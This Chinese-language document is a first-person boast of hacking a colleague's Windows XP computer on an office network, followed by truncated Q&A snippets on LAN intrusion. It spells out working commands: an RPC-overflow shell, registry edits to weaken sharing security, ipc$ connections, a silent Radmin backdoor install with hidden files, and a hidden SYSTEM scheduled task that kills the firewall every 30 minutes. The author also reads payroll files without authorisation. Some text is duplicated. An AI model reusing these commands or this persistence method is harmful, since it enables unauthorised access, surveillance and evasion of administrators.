先打开命令提示符,用ping命令去ping它,Replyfrom192.168.16.4:bytes=32time<1msTTL=128,说明对方没有防火墙,这样或许有可能入侵。
下一步,我使用了X-SCAN3.2对它进行了详细扫描,对方电脑的操作系统是XP,大家知道XP系统是相当安全的,在一些黑客论坛讨论的关于入侵XP的话题也是比较多的,入侵这样的系统方法只有两种,一是采用钓鱼的方法,这是一种被动的方式让对方中木马来控制它。
第二种方法就是如果对方有比较严重的漏洞,如RPC溢出
先打开命令提示符,用ping命令去ping它,Replyfrom192.168.16.4:bytes=32time<1msTTL=128,说明对方没有防火墙,这样或许有可能入侵。下一步,我使用了X-SCAN3.2对它进行了详细扫描,对方电脑的操作系统是XP,大家知道XP系统是相当安全的,在一些黑客论坛讨论的关于入侵XP的话题也是比较多的,入侵这样的系统方法只有两种,一是采用钓鱼的方法,这是一种被动的方式让对方中木马来控制它。第二种方法就是如果对方有比较严重的漏洞,如RPC溢出。这样的话,用溢出程序溢出它,然后再上传控制程序进行控制。扫描结果确实让我高兴了一阵,对方电脑有大量的漏洞,其中一个比较有名的就是冲击波利用的RPC漏洞,这个漏洞相当出名了,03年的时候曾席卷全球。知道了它有这个漏洞,下一步就要找溢出程序,这让我忙活了好一阵时间,因为有的溢出程序对这台电脑好像无效。这些工具的名称我都记不起来了,反正有好几个。最后找到了一个溢出程序XP.EXE,这个程序终于溢出了那台电脑。得到了个CMDSHELL。这算是一个小小的胜利吧。
得到了CMDSHELL,我该怎样给它上传控制程序呢?我想了一会儿,终于灵感来了,我和它在一个局域网,用共享上传最方便了。于是打开网上邻居,查看工作组计算机,找到这台电脑,双击,进不去,提示信息我记不清了,据我分析可能是对方这台电脑没有运行网络安装向导,因为是XP系统,所以要用共享传输文件,必须要运行这个向导不可,运行这个向导作用就是配置一个本地安全策略,你可以打开“控制面板—管理工具—本地安全策略”,展开“本地策略”—“用户权利指派”。在右边有一个安全策略—“拒绝从网络访问这台计算机”。我想对方的电脑中相应的这条策略里,肯定设置有GUEST这个用户的,这就是为什么我打不开它的共享的原因,因为共享访问默认是以这个GEUST用户登录的,因为它的安全设置不允许GUEST从网络访问,所以我才访问不了它的共享。因为XP默认的共享模式是简单文件共享。这与WIN2000系统不同,如果是WIN2000系统,你在知道管理员密码的情况下,可以用命令netuseIPipc$"密码"/user:用户名建立与对方的ipc$连接,随之而来的就是copy木马程序ipd$这样的命令上传木马了。XP就不能这样子了,你即使知道它的管理员密码用上面的命令与不能建立ipc$连接。这就是为什么XP比2000系统安全的地方所在。下面我要作的就是要修改XP的共享模式为2000的共享模式。方法如下:在溢出获得的CMDSHELL下,键入命令:
echoWindowsRegistryEditorVersion5.00>c:123.reg
echo[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]>>c:123.reg
echo.>>c:123.reg
echo"forceguest"=dword:00000000>>c:123.reg
regedit/ec:123.reg
等打完这几条命令后,对方XP的共享模式就已经与2000的相同了。我来解释一下这几条命令的含意,echoWindowsRegistryEditorVersion5.00>c:123.reg这条命令是将WindowsRegistryEditorVersion5.00这几个字符保存到c:123.reg文件里。大家需要注意一下第一句的>和后面几句的>>这是有区别的,>字符是覆盖式的,>>是追加式的,第三句的echo.>>c:123.reg命令是追加一个空白行,这句挺重要,如果不加这句是不能成功的,你可以随便打开一个注册表文件看一下,格式就是这样的,第二行是空着的。这一点一定要注意。执行完前四条命令后就在对方C盘下生成一个123.reg文件,内容如下:
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
第五条命令是将这个REG文件导入到注册表中。这样执行完这五条命令后,我就可以像操作2000系统一样去用ipc$控制了。下一步,上传控制程序。我选择的是RADMIN2.0的服务程序,有人问这个安装需要到图形界面下,我说不用这么费事,在CMDSHELL下一样可以安装。安装前我们需要先准备一下,首先生成一个REG文件,文件名:aaa.reg内容如下:
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]
"DisableTrayIcon"=hex:01,00,00,00
作用就是使生成的服务端程序能够隐藏通知栏里的图标,我们都知道正常安装RADMIN服务端程序后,在通知栏里是有一个小图标的,我们要入侵人家,当然要把这个小图标去掉,不然是会被发现的。接着生成一个BAT文件,我命名为aaa.bat,内容如下:
r_server/install/silence
r_server.exe/port:2233/pass:1/save/silence
regedit.exe/saaa.reg
netstartr_server
这些命令是安装命令,设置连接端口为:2233密码是:1隐藏安装界面的方式安装然后就是将aaa.reg导入注册表,启动r_server服务。
准备工作作好后,就要上传文件了,一共需上传4个文件,aaa.regaaa.batr_server.exeadmdll.dll后两个文件是RADMIN安装目录下的,在安装了RADMIN2.0客户端后,安装目录里就有这两个文件。我先建立ipc$连接netuse192.168.16.4ipc$""/user:administrator提示:命令成功完成。接着:
copyr_server192.168.1.4admin$system32
copyaaa.bat192.168.1.4admin$system32
copyaaa.reg192.168.1.4admin$system32
copyadmdll.dll192.168.1.4admin$system32
然后再进入溢出得到的CMDSHELL下键入:
attrib+s+h+rc:windowssystem32r_server.exe
attrib+s+h+rc:windowssystem32admdll.exe
attrib+s+h+rc:windowssystem32aaa.bat
attrib+s+h+rc:windowssystem32aaa.reg
这些命令是将这4个文件设置成系统隐藏只读文件,不容易被对方管理员发现。
下一步就是运行aaa.bat了,就这么简单,运行成功后,我用radmin2.0客户端设置了一下连接参数,端口改成2233,连接成功,密码是1,成功地看到了对方的屏幕。呵呵,成功了,从有入侵的想法到入侵成功进行控制,只用了短短的4天时间。
进入后看到对方电脑上正在玩QQ保皇游戏,不过我也犯了个错误我给它新建了个管理用户,原先是打算用于ipc$连接用的,可我上传RADMIN控制后忘记删掉了,我在溢出的CMDSHELL下不小心键入了命令EXIT,结果对方电脑出现了倒计时关机的界面,我也没有及时处理掉,我当时要是用RADMIN的CMD功能,键入命令shutdown-A就可以取消这个倒计时关机的界面,可当时我也没有及时处理,导致对方电脑重启了,重启后我估计对方管理员看到了我新建的用户了,后来我用RADMIN远程查看时,也觉得这个新建用户太招摇了,用户名就是ip$,图标是个大红的花朵。
下午的时候我发现那台电脑的管理员请了位高手来助阵了,因为我们这个局域网中的各台电脑都通过我们办公室里的那台电脑连接到互联网上,所以,那位高手先到我们办公室电脑上查看了一番没有发现问题后,他将原先安装的江民换成了卡巴了,我估计他认为攻击是来自互联网上,岂不知黑客就在他眼皮底下,嘿嘿。。。。那位高手又给被我控制了的电脑上安装了卡巴,原先的杀毒软件是诺顿,对WINDOWS也进行了更新,可这些作法都晚了,因为我已经控制你了,再打补丁也无用了。经过那位高手一番检查与修补后,我的后门依然存在着,看来那位高手水平也不怎么样。我给它开放的ipc$功能,他也没发现。也许他只认为是一次简单的病毒攻击,而掉以轻心了,而不知他的一举一动都在我的监视之下。哈哈。。。
接下来的工作对我来说就比较简单了,给它开telnet服务器,开“远程桌面”这个我采用的是图形的方式进行操作的,中午下班后我等这台计算机管理员走后,用RADMIN登录进去进行了一些设置工作。后来也通过RADMIN的文件管理功能翻看了这台电脑上的文件,有一些财务报表,工资表之类的东西,这些对我来看没什么大的吸引力。不过我看到了我们集团老总的工资,每月一万多块钱呢!!好黑啊。。。这么多,我工资只有区区几百块,真是太不公平了,愤愤不平中。。。。
后来一次通过RADMIN操作对方的电脑时不小心被管理员发现了,我想对方的管理员也很感到意外,windows的补丁打上了,还装了强悍的卡巴,还是搞不定黑客!!哈哈,因为卡巴不是杀RADMIN的。后来对方那个管理员启用了局域网“本地连接”中的防火墙功能,这样我无法连接它的电脑了。因为RADMIN是正向连接的,所以在对方开防火墙的情况下是无法使用的。有一次下午下班后我无意地ping了一下这台电脑的IP,居然有返回。说明对方防火墙关闭了,我马上用RADMIN连接,居然成功。我晕。。。原来对方只开了防火墙,并没有发现这个明显的后门。我想开防火墙也是那位电脑高手给搞的,依那个管理员的水平是想不到这个办法的。不过telnet服务器给关闭了,3389远程桌面也给关了,共享模式也被修改回了原先的样子。看来那位高手也是发现了一些漏洞并补上了,但是那个后门,他却没有发现,这就给我创造了第二次入侵的机会。他有政策我有对策,他可以开防火墙,我可以给他关掉,有人问要是再被管理员开启了防火墙,那岂不是没得玩了。哈哈。。。我下面给出一个我自己研究出来的独门密方,保证百病!哈哈。。。。
我的方法是创建一个隐藏的计划任务。让这个计划任务每隔半个小时杀除一遍防火墙,这样即使对方管理员打开防火墙也起不了什么作用。方法如下:先建一个批处理文件abc.bat,放在c:windowssystem32目录下,内容如下:
netstopsharedaccess
当然也可以附加点别的,比如说你想半小时杀除一遍天网防火墙,可以再加上下面的命令:
taskkill/IMrfw.exe/f
如果想使共享模式是高级共享模式,可以再加上下面的命令:
regedit/ec:windowssystem32abc.reg
当然这需要事先上传一个abc.reg到它的c:windowssystem32目录下,内容如下:
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
下面我说一下创建隐藏计划任务的方法:
在对方电脑的CMDSHELL下键入命令:
schtasks/create/tn"常驻"/trc:windowssystem32abc.bat/scminute/mo30/ru"system"
这样就在对方电脑上建立了一个以SYSTEM权限运行的计划任务,这个计划任务每隔30分钟运行一次c:windowssystem32abc.bat,功能嘛,就是根据abc.bat里面的命令行决定了,可以说这个新发现是相当厉害的,利用的巧妙,功能可以相当强大。如果只有这样还不能达到隐藏的要求,你打开控制面板—任务计划,仍然可以发现它的存在。好的,下面说说隐藏它的方法。还是进入CMDSHELL中。键入命令attrib+hc:windowstasks常驻.job回车后,你再到控制面板的任务计划中看一下是不是以前的任务消失了。这只是表面消失,实际是它还是存在的。你可以在CMDSHELL下键入命令:schtasks查看。这样不管对方管理员怎样修改设置,每隔半小时就又会补修改回来。它想摆脱我的控制可说是难上加难了。
局域网入侵命令有哪些?
先打开命令提示符,用ping命令去ping它,Replyfrom192.168.16.4:bytes=32time<1msTTL=128,说明对方没有防火墙,这样或许有可能入侵。 下一步,我使用了X-SCAN3.2对它进行了详细扫描,对方电脑的操作系统是XP,大家知道XP系统是相当安全的,在一些黑客论坛讨论的关于入侵XP的话题也是比较多的,入侵这样的系统方法只有两种,一...
局域网中在开始菜单运行里输入什么会进入别人电脑?
输入的是:\\\\\\aa,其中是aa是别人的计算机名;\\x0d\\x0a 常用的命令有:\\x0d\\x0a winver---检查Windows版本\\x0d\\x0a \\x0d\\x0a wmimgmt.msc---打开windows管理体系结构(WMI)\\x0d\\x0a \\x0d\\x0a wupdmgr---windows更新程序\\x0d\\x0a \\x0d\\x0a wscript---windows脚本宿主...
知道别人的IP地址怎样才能入侵?
答:ipconfigall中看本机ip地址。1.查看电脑在局域网里的ip地址 首先,右击“网上邻居”,选择“属性”; 然后,在打开的窗口中找到“本地连接”,右击,选择“属性”; 第三,在弹出的对话框中。2.查看电脑在当前互联网中的ip地址 互联网中的IP地址不像局域网中IP地址那样可以随意自己指定与设置,该IP地...
怎样入侵局域网电脑
入侵局域网电脑 方法 一 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对...
怎么入侵局域网的电脑?
利用ipc$入侵的相关命令:我们在入侵的时候难免遇到忘记命令的时候,现在将我所知道的一些命令总结出来提供给各位。通过这些命令可以解决很大一部分新手的问题。00:net use 作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。命令格式:net use [devicename | *] [\\\\\\computername\\\\...
怎样入侵同在一个局域网的电脑?
方法一: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 ...
局域网入侵命令详解局域网入侵
局域网入侵一步:1.使用“NTscan异常扫描仪”,在IP上填写要扫描的IP范围,选择“WMI扫描”,按“开始”,等待扫描结果。2.使用‘rect on-D特别版自由杀戮’选择“CMD命令”,并在“CMD:”中输入“net share C$=C: ”,打开远程主机的c盘共享。把c改成D,E,F等等。可以打开D、E、F等的...
如何入侵局域网内的机子?他密码空的。他在我们上网时开迅雷,想教训他...
1、net use \\\\对方IP\\admin 2、系统会提示你输入用户名和密码,输入他的用户名和密码后,回车,系统会提示“命令成功完成”3、开启对方的telnet服务(可能已关闭,不用怕,可以开的)sc \\\\对方IP config tlntsvr start= auto (auto前有空格,否则不能成功)sc \\\\对方IP start tlntsvr 4、telnet...
怎么入侵区域网内电脑_如何侵入局域网
当然,你也可以先在命令提示符中输入以下命令:net use \\\\IP地址\\ipc$ "密码(若无密码则为空)" \/user:administrator再通过上面的方法访问局域网内的其他计算机 6.怎么入侵局域网 答:一般机密,机要单位办公都设局域网。局域网只要不接入公众网就不会被入侵。对于使用局域网的人要有严格...
怎样攻击别人的计算机
通过扫描21端口或3389端口就可以入侵 一般黑客入侵所需要的几个常用命令 1:NET 只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 net use \\\\127.0.0.1\\ipc$ "123456" \/user:"hbx"退出的命令是 net use \\\\127.0....